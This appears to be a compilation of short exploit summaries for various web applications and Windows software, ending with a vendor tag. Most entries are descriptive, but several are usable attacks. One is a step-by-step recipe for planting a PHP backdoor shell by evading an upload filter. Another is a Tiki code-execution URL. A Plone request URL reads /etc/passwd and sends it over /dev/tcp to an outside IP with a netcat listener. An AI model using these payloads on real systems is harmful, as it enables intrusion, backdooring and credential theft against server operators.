A buffer overflow vulnerability was discovered in the Nagios Plugin 'check_ups' which can be exploited by an attacker to execute arbitrary code on the vulnerable system. The vulnerability is caused due to a boundary error when handling user-supplied input. By supplying a specially crafted argument to the '-u' option, an attacker can cause a stack-based buffer overflow and gain control of the execution flow of the application.
This exploit allows hackers to upload a PHP backdoor into "/pictures/" directory via the use of Live HTTP Headers (Firefox Addon). Tools Needed: Live HTTP Headers, Backdoor Shell. Step 1: Locate upload form on index page. Step 2: Rename your shell to shell.php.jpg and start capturing data with Live HTTP Headers. Step 3: Enter tags for the image (can be anything). Step 4: Replay data with Live HTTP Headers - Step 5: Change [Content-Disposition: form-data; name="image1"; filename="shell.php.jpg"rn] to [Content-Disposition: form-data; name="image1"; filename="shell.php"rn]. Step 6: Locate pictures directory: www.site.tld/imagehostingscript/pictures/ (usually). Step 7: Find PHP file (random digits.php) = should look like (321879194bc8ff2843bf7b63a666f665.php). Step 8: Navigate to backdoor = www.site.tld/imagehostingscript/pictures/321879194bc8ff2843bf7b63a666f665.php
Unauthorized users can download arbitrary files from the server using this exploit. The bug is in config.php, but accessible from other file. The PoC involves setting up a MySQL database, creating a table with a specific structure, adding a raw into the database, and calling the script with database parameters and file id to download.
A buffer overflow vulnerability exists in the GdiDrawStream function of win32k.sys when handling a specially crafted HTML page. An attacker can exploit this vulnerability to execute arbitrary code in the context of the current user.
The validateUser.php script is vulnerable to SQL injection. An attacker can send a malicious request to the validateUser.php script with a crafted username parameter, which will allow the attacker to execute arbitrary SQL queries.
This exploit is a directory traversal vulnerability which allows an attacker to delete files and directories outside of the intended directory. The exploit is triggered by creating a directory named 'trigger_alt' and a subdirectory named '....' in the root directory of the system. The attacker then uses the SHFileOperation function to delete the 'trigger_alt' directory, which in turn deletes the '....' directory and any other files or directories outside of the intended directory.
This exploit is a buffer overflow vulnerability in MySQL 5.5.8 on Windows. It allows an attacker to send a specially crafted packet to the MySQL server, which will cause a null pointer dereference and crash the server. The exploit is triggered by sending two specially crafted packets to the MySQL server, the first packet contains a null byte followed by a 4 byte integer, and the second packet contains a specially crafted string. The exploit is triggered when the server attempts to process the second packet.
There is a few file upload vulnerabilities in the administrative interfaces of these applications that are unprotected and allow any peepz to CSRF it.
The vulnerable code is located into /lib/wiki-plugins/wikiplugin_snarf.php: input passed through $_REQUEST['regex'] is checked by a regular expression at line 171 to prevent execution of arbitrary PHP code using the 'e' modifier in a call to preg_replace() at line 172. But this check could be bypassed with a null byte injection, requesting an URL like this: http://<hostname>/tiki-8.2/snarf_ajax.php?url=1®exres=phpinfo()®ex=//e%00/. Tiki internal filters remove all null bytes from user input, but for some strange reason this doesn't happen within admin sessions. So, successful exploitation of this vulnerability requires an user account with administration rights and 'PluginSnarf' to be enabled (not by default).
You can execute any command on the remote Plone server with the following request if the server is Unix/Linux based (Note: you won't get returned the results of the command): http://PLONE_SITE/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=<command to run>. For example, to listen for a connection, the attacker can use the command 'nc -l 4040' and on the victim, visit http://victim/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cat%20/etc/passwd%20%20%3E%20/dev/tcp/172.20.6.218/4040
Services By CQR